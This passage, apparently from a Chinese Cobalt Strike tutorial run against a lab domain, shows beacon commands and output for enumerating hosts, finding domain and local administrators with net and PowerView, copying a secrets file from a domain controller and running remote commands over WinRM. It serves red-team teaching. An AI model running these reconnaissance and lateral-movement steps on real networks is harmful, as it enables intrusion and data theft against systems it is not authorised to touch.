</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br></div></div><p>在 beacon 控制台中输入这些命令与输入本地的 net 命令很相似，但是有些许不同。比如下面第一个是在主机上运行 net view 的结果，第二个是在 beacon 控制台下运行 net view 的结果。不难看出，beacon 下输出的结果更为丰富。</p> <div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code><span class="token function">PS</span> C:\&gt; net view
服务器名称            注解
<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">-</span>
\\WIN<span class="token operator">-</span>P2AASSD1AF1
命令成功完成。
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br></div></div><div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>beacon&gt; net view
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> Tasked beacon to run net view
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> host called home<span class="token punctuation">,</span> sent: 104504 bytes
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> received output:
List of hosts:
Server Name             IP Address                       Platform  Version  <span class="token function">Type</span>   Comment
<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>             <span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">-</span>                       <span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>  <span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">-</span>  <span class="token operator">--</span>-<span class="token operator">-</span>   <span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">-</span>
WIN<span class="token operator">-</span>P2AASSD1AF1         192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>15<span class="token punctuation">.</span>124                   500       6<span class="token punctuation">.</span>1      PDC    
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br></div></div><p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs15-1.png" alt=""></p> <h3 id="用户枚举">用户枚举 <a href="#用户枚举" class="header-anchor">#</a></h3> <p>用户枚举的三个关键步骤：</p> <p>1、当前账号是否为管理员账号？</p> <p>2、哪些账号是域管理员账号？</p> <p>3、哪个账号是这个系统上的本地管理员账号？</p> <h4 id="管理员账号">管理员账号 <a href="#管理员账号" class="header-anchor">#</a></h4> <p>第一个关键步骤，发现管理员账号。</p> <p>如果想知道自己是否为管理员账号，可以尝试运行一些只有管理员账号才有权限操作的命令，然后通过返回结果判断是否为管理员。</p> <p>其中一种方式是尝试列出仅管理员才能访问的共享，比如下面的 <code>dir \\host\C$</code> 命令，如果可以看到文件列表，那么说明当前账号可能拥有目标主机的本地管理员权限。</p> <div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>shell <span class="token function">dir</span> \\host\C$
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code><span class="token comment">#管理员账号运行结果</span>
beacon&gt; shell <span class="token function">dir</span> \\WinDC\C$
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> Tasked beacon to run: <span class="token function">dir</span> \\WinDC\C$
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> host called home<span class="token punctuation">,</span> sent: 55 bytes
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> received output:
 驱动器 \\WinDC\C$ 中的卷没有标签。
 卷的序列号是 F269<span class="token operator">-</span>89A7
 \\WinDC\C$ 的目录
2020<span class="token operator">/</span>06<span class="token operator">/</span>24  09:29    &lt;<span class="token function">DIR</span>&gt;          inetpub
2009<span class="token operator">/</span>07<span class="token operator">/</span>14  11:20    &lt;<span class="token function">DIR</span>&gt;          PerfLogs
2020<span class="token operator">/</span>07<span class="token operator">/</span>16  21:24    &lt;<span class="token function">DIR</span>&gt;          Program Files
2020<span class="token operator">/</span>07<span class="token operator">/</span>16  21:52    &lt;<span class="token function">DIR</span>&gt;          Program Files <span class="token punctuation">(</span>x86<span class="token punctuation">)</span>
2020<span class="token operator">/</span>07<span class="token operator">/</span>17  23:00    &lt;<span class="token function">DIR</span>&gt;          Users
2020<span class="token operator">/</span>07<span class="token operator">/</span>26  00:55    &lt;<span class="token function">DIR</span>&gt;          Windows
               0 个文件              0 字节
               6 个目录 28<span class="token punctuation">,</span>500<span class="token punctuation">,</span>807<span class="token punctuation">,</span>680 可用字节
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br><span class="line-number">10</span><br><span class="line-number">11</span><br><span class="line-number">12</span><br><span class="line-number">13</span><br><span class="line-number">14</span><br><span class="line-number">15</span><br><span class="line-number">16</span><br></div></div><div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code><span class="token comment">#一般账号运行结果</span>
beacon&gt; shell <span class="token function">dir</span> \\WinDC\C$
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> Tasked beacon to run: <span class="token function">dir</span> \\WinDC\C$
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> host called home<span class="token punctuation">,</span> sent: 55 bytes
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> received output:
拒绝访问。
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br></div></div><p>也可以运行其他命令，比如运行下面的 <code>at</code> 命令来查看系统上的计划任务列表，如果显示出了任务列表信息，那么可能是本地管理员。（当任务列表没有信息时会返回 “列表是空的” 提示）</p> <div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>shell at \\host
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code><span class="token comment">#管理员账号运行结果</span>
beacon&gt; shell at \\WinDC
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> Tasked beacon to run: at \\WinDC
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> host called home<span class="token punctuation">,</span> sent: 51 bytes
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> received output:
状态 ID     日期                    时间          命令行
<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">-</span>
        1   今天                    22:30         E:\Install\Thunder\Thunder<span class="token punctuation">.</span>exe
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br></div></div><div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code><span class="token comment">#一般账号运行结果</span>
beacon&gt; shell at \\WinDC
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> Tasked beacon to run: at \\WinDC
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> host called home<span class="token punctuation">,</span> sent: 51 bytes
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> received output:
拒绝访问。
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br></div></div><p>在上一节讲述的 <code>PowerView</code> 有很多很好的自动操作来帮助解决这些问题。可以在加载 <code>PowerView</code> 后，运行下面的命令，通过 <code>PowerView</code> 可以快速找到管理员账号。</p> <div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>powershell <span class="token function">Find-LocalAdminAccess</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>beacon&gt; powershell<span class="token operator">-</span>import powerview<span class="token punctuation">.</span>ps1
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> Tasked beacon to import: powerview<span class="token punctuation">.</span>ps1
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> host called home<span class="token punctuation">,</span> sent: 101224 bytes

beacon&gt; powershell <span class="token function">Find-LocalAdminAccess</span>
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> Tasked beacon to run: <span class="token function">Find-LocalAdminAccess</span>
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> host called home<span class="token punctuation">,</span> sent: 329 bytes
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> received output:
WinDC<span class="token punctuation">.</span>teamssix<span class="token punctuation">.</span>com
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br></div></div><h4 id="域管理员账号">域管理员账号 <a href="#域管理员账号" class="header-anchor">#</a></h4> <p>第二个关键步骤，发现域管理员账号。</p> <p><strong>列出域管理员</strong></p> <p>要发现域管理员账号，可以在 shell 中直接使用 Windows 自带的命令。运行以下两条命令可以找出“Enterprise Admins”和“Domain Admins”这两个域组的成员。</p> <div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>net <span class="token function">group</span> <span class="token string">&quot;enterprise admins&quot;</span> <span class="token operator">/</span>DOMAIN
net <span class="token function">group</span> <span class="token string">&quot;domain admins&quot;</span> <span class="token operator">/</span>DOMAIN
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br></div></div><div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>beacon&gt; shell net <span class="token function">group</span> <span class="token string">&quot;enterprise admins&quot;</span> <span class="token operator">/</span>domain
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> Tasked beacon to run: net <span class="token function">group</span> <span class="token string">&quot;enterprise admins&quot;</span> <span class="token operator">/</span>domain
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> host called home<span class="token punctuation">,</span> sent: 68 bytes
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> received output:
组名     Enterprise Admins
注释     企业的指定系统管理员
成员
<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">-</span>
Administrator            
命令成功完成。
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br><span class="line-number">10</span><br></div></div><div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>beacon&gt; shell net <span class="token function">group</span> <span class="token string">&quot;domain admins&quot;</span> <span class="token operator">/</span>domain
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> Tasked beacon to run: net <span class="token function">group</span> <span class="token string">&quot;domain admins&quot;</span> <span class="token operator">/</span>domain
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> host called home<span class="token punctuation">,</span> sent: 64 bytes
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> received output:
组名     Domain Admins
注释     指定的域管理员
成员
<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">-</span>
Administrator            
命令成功完成。
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br><span class="line-number">10</span><br></div></div><p>或者运行下面的命令来看谁是域控制器上的管理员</p> <div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>net localgroup <span class="token string">&quot;administrators&quot;</span> <span class="token operator">/</span>DOMAIN
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>beacon&gt; shell net localgroup <span class="token string">&quot;administrators&quot;</span> <span class="token operator">/</span>domain
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> Tasked beacon to run: net localgroup <span class="token string">&quot;administrators&quot;</span> <span class="token operator">/</span>domain
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> host called home<span class="token punctuation">,</span> sent: 70 bytes
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> received output:
别名     administrators
注释     管理员对计算机<span class="token operator">/</span>域有不受限制的完全访问权
成员
<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">-</span>
administrator
Domain Admins
Daniel
Enterprise Admins
命令成功完成。
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br><span class="line-number">10</span><br><span class="line-number">11</span><br><span class="line-number">12</span><br><span class="line-number">13</span><br></div></div><p><strong>Net 模块</strong></p> <p>beacon 的 net 模块也可以帮助我们。下面的命令中，<code>TARGET</code> 指一个域控制器，<code>group name</code> 指任何想查看的组名，比如 Enterprise Admins、Domain Admins 等。</p> <div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>net <span class="token function">group</span> \\TARGET <span class="token function">group</span> name
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p>也可以运行下面的命令，这会连接任意目标来获取列表</p> <div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>net localgroup \\TARGET <span class="token function">group</span> name
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><h4 id="本地管理员">本地管理员 <a href="#本地管理员" class="header-anchor">#</a></h4> <p><strong>Net 模块</strong></p> <p>本地管理员可能是一个域账户，因此如果想把一个系统作为目标，应该先找到谁是这个系统的本地管理员，因为一旦获得了该账户的密码哈希值或凭据，就可以伪装成那个用户。</p> <p>beacon 的 net 模块可以在无特权的上下文中查询目标系统上的本地组和用户。</p> <p>在 beacon 控制台中运行下面的命令可以获得目标上的群组列表</p> <div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>net localgroup \\TARGET
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p>如果想获取某个群组的成员，可运行下面的命令来获得该群组的成员名单。</p> <div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>net localgroup \\TARGET <span class="token function">group</span> name
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>beacon&gt; net localgroup \\WinDC administrators
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> Tasked beacon to run net localgroup administrators on WinDC
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> host called home<span class="token punctuation">,</span> sent: 104510 bytes
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> received output:
Members of administrators on \\WinDC:
TEAMSSIX\Administrator
TEAMSSIX\Daniel
TEAMSSIX\Enterprise Admins
TEAMSSIX\Domain Admins
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br></div></div><p><strong>PowerView 模块</strong></p> <p>使用下面的 PowerView 命令可以找到一台主机上的本地管理员，它实际上是查询该主机的本地 Administrators 组并返回其成员名单。</p> <div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code><span class="token function">Get-Netlocalgroup</span> <span class="token operator">-</span>hostname TARGET
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>beacon&gt; powershell <span class="token function">Get-Netlocalgroup</span> <span class="token operator">-</span>Hostname WinDC
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> Tasked beacon to run: <span class="token function">Get-Netlocalgroup</span> <span class="token operator">-</span>Hostname WinDC
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> host called home<span class="token punctuation">,</span> sent: 385 bytes
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> received output:

ComputerName : WinDC
AccountName  : teamssix<span class="token punctuation">.</span>com<span class="token operator">/</span>Administrator
IsDomain     : True
IsGroup      : False
SID          : S<span class="token operator">-</span>1<span class="token operator">-</span>5<span class="token operator">-</span>22<span class="token operator">-</span>3301978333<span class="token operator">-</span>983314215<span class="token operator">-</span>684642015<span class="token operator">-</span>500
Description  : 
Disabled     : 
LastLogin    : 2020<span class="token operator">/</span>8<span class="token operator">/</span>17 22:21:23
PwdLastSet   : 
PwdExpired   : 
UserFlags    : 

ComputerName : WinDC
AccountName  : teamssix<span class="token punctuation">.</span>com<span class="token operator">/</span>Daniel
……内容过多，余下部分省略……
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br><span class="line-number">10</span><br><span class="line-number">11</span><br><span class="line-number">12</span><br><span class="line-number">13</span><br><span class="line-number">14</span><br><span class="line-number">15</span><br><span class="line-number">16</span><br><span class="line-number">17</span><br><span class="line-number">18</span><br><span class="line-number">19</span><br><span class="line-number">20</span><br></div></div><h2 id="_3、无需恶意软件">3、无需恶意软件 <a href="#_3、无需恶意软件" class="header-anchor">#</a></h2> <p>如果一个系统信任我们为本地管理员权限，那么我们可以在那个系统上干什么呢？</p> <p><strong>查看共享文件</strong></p> <p>比如我们可以通过运行下面的命令来列出 C:\foo 的共享文件</p> <div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>shell <span class="token function">dir</span> \\host\C$\foo
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>beacon&gt; shell <span class="token function">dir</span> \\WinDC\C$
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> Tasked beacon to run: <span class="token function">dir</span> \\WinDC\C$
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> host called home<span class="token punctuation">,</span> sent: 55 bytes
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> received output:
 驱动器 \\WinDC\C$ 中的卷没有标签。
 卷的序列号是 F269<span class="token operator">-</span>89A7
 \\WinDC\C$ 的目录
2020<span class="token operator">/</span>06<span class="token operator">/</span>24  09:29    &lt;<span class="token function">DIR</span>&gt;          inetpub
2009<span class="token operator">/</span>07<span class="token operator">/</span>14  11:20    &lt;<span class="token function">DIR</span>&gt;          PerfLogs
2020<span class="token operator">/</span>07<span class="token operator">/</span>16  21:24    &lt;<span class="token function">DIR</span>&gt;          Program Files
2020<span class="token operator">/</span>07<span class="token operator">/</span>16  21:52    &lt;<span class="token function">DIR</span>&gt;          Program Files <span class="token punctuation">(</span>x86<span class="token punctuation">)</span>
2020<span class="token operator">/</span>07<span class="token operator">/</span>17  23:00    &lt;<span class="token function">DIR</span>&gt;          Users
2020<span class="token operator">/</span>07<span class="token operator">/</span>26  00:55    &lt;<span class="token function">DIR</span>&gt;          Windows
               0 个文件              0 字节
               6 个目录 28<span class="token punctuation">,</span>500<span class="token punctuation">,</span>393<span class="token punctuation">,</span>984 可用字节
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br><span class="line-number">10</span><br><span class="line-number">11</span><br><span class="line-number">12</span><br><span class="line-number">13</span><br><span class="line-number">14</span><br><span class="line-number">15</span><br></div></div><p><strong>复制文件</strong></p> <p>比如运行下面的命令将 <code>secrets.txt</code>文件复制到当前目录。</p> <div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>shell <span class="token function">copy</span> \\host\C$\foo\secrets<span class="token punctuation">.</span>txt
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>beacon&gt; shell <span class="token function">copy</span> \\WinDC\C$\foo\secrets<span class="token punctuation">.</span>txt
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> Tasked beacon to run: <span class="token function">copy</span> \\WinDC\C$\foo\secrets<span class="token punctuation">.</span>txt
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> host called home<span class="token punctuation">,</span> sent: 93 bytes
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> received output:
已复制         1 个文件。
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br></div></div><p><strong>查看文件列表</strong></p> <p>比如运行下面的命令。其中 /S 表示列出指定目录及子目录所有文件，/B 表示使用空格式，即没有标题或摘要信息。</p> <div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>shell <span class="token function">dir</span> <span class="token operator">/</span>S <span class="token operator">/</span>B \\host\C$
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>beacon&gt; shell <span class="token function">dir</span> <span class="token operator">/</span>S <span class="token operator">/</span>B \\WinDC\C$\Users
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> Tasked beacon to run: <span class="token function">dir</span> <span class="token operator">/</span>S <span class="token operator">/</span>B \\WinDC\C$\Users
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> host called home<span class="token punctuation">,</span> sent: 67 bytes
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> received output:
\\WinDC\C$\Users\administrator
\\WinDC\C$\Users\Classic <span class="token punctuation">.</span>NET AppPool
\\WinDC\C$\Users\Daniel
\\WinDC\C$\Users\Public
\\WinDC\C$\Users\administrator\Contacts
\\WinDC\C$\Users\administrator\Desktop
\\WinDC\C$\Users\administrator\Documents
\\WinDC\C$\Users\administrator\Downloads
\\WinDC\C$\Users\administrator\Favorites
……内容过多，余下部分省略……
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br><span class="line-number">10</span><br><span class="line-number">11</span><br><span class="line-number">12</span><br><span class="line-number">13</span><br><span class="line-number">14</span><br></div></div><p><strong>使用 WinRM 运行命令</strong></p> <p>WinRM 默认运行在 5985 端口上，它是 Windows 的远程管理服务，使用 WinRM 可以让远程管理更容易一些。</p> <p>如果想利用 WinRM 运行命令，则可以使用下面的命令。</p> <div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>powershell <span class="token function">Invoke-Command</span> <span class="token operator">-</span>ComputerName TARGET <span class="token operator">-</span>ScriptBlock <span class="token punctuation">{</span>command here<span class="token punctuation">}</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>beacon&gt; powershell <span class="token function">Invoke-Command</span> <span class="token operator">-</span>ComputerName WinDC <span class="token operator">-</span>ScriptBlock <span class="token punctuation">{</span> net localgroup administrators<span class="token punctuation">}</span>
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> Tasked beacon to run: <span class="token function">Invoke-Command</span> <span class="token operator">-</span>ComputerName WinDC <span class="token operator">-</span>ScriptBlock <span class="token punctuation">{</span> net localgroup administrators<span class="token punctuation">}</span>
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> host called home<span class="token punctuation">,</span> sent: 303 bytes
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> received output:
别名     administrators
注释     管理员对计算机<span class="token operator">/</span>域有不受限制的完全访问权
成员
<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">-</span>
Administrator
Domain Admins
Daniel
Enterprise Admins
命令成功完成。
